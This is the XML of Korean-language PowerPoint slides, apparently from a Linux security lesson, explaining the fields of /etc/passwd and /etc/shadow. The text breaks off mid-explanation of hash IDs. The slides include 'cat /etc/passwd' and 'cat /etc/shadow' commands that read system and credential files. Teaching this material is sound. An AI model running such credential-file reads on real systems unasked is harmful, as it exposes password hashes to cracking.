                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>root : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 정보 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>이름이나 연락처 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>같은것을</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>적는란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="666666"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>/root : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 계정 디렉토리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>계정 홈 디렉토리</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>) </a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800">
                        <a:solidFill>
                          <a:srgbClr val="666666"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/bin/bash : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>사용자 로그인 쉘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>bash,csh,zsh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>....)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="180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a:effectLst/>
                <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>cat /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15724424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/Theory/T3/Passwd </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>패스워드 구조 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>– shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1.Login Name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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사용자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>계정각</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 항목별 구분은 </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콜론</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으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>구분되어있으며</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 콜론과 콜론 사이 각 필드에는 다음과 같은 구조로 구성되어 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2.Encrypted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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패스워드를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>암호화시킨</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 값</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>3.Last Changed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>: 1970</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>년부터 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>월 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>일부터 패스워드가 수정된 날짜의 일수를 계산</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>4.Minimum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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패스워드가 변경되기 전 최소 사용기간</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일수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>5.Maximum</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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패스워드 변경 전 최대 사용기간</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일수</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>6.Warn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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패스워드 사용 만기일 전에 경고 메시지를 제공하는 일수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>7.Inactive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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로그인 접속 차단 일 수</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8.Expire</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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로그인 사용을 금지하는 일 수 </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월</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일</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연도</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>9.Reserved</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>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사용되지 않음</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="180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a:effectLst/>
                <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>cat /etc/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1.Login Name </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans KR"/>
                        </a:rPr>
                        <a:t>root</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>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사용자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>계정각</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 항목별 구분은 </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콜론</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으로 구분 되어 있으며</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 콜론과 콜론 사이 각 필드에는 다음과 같은 구조로 구성되어 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2.Encrypted</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" b="0" i="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans KR"/>
                        </a:rPr>
                        <a:t>$ ~ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>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패스워드를 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>암호화시킨</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 값 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>- </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Hashid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="1" i="1" kern="1200">
                          <a:solidFill>
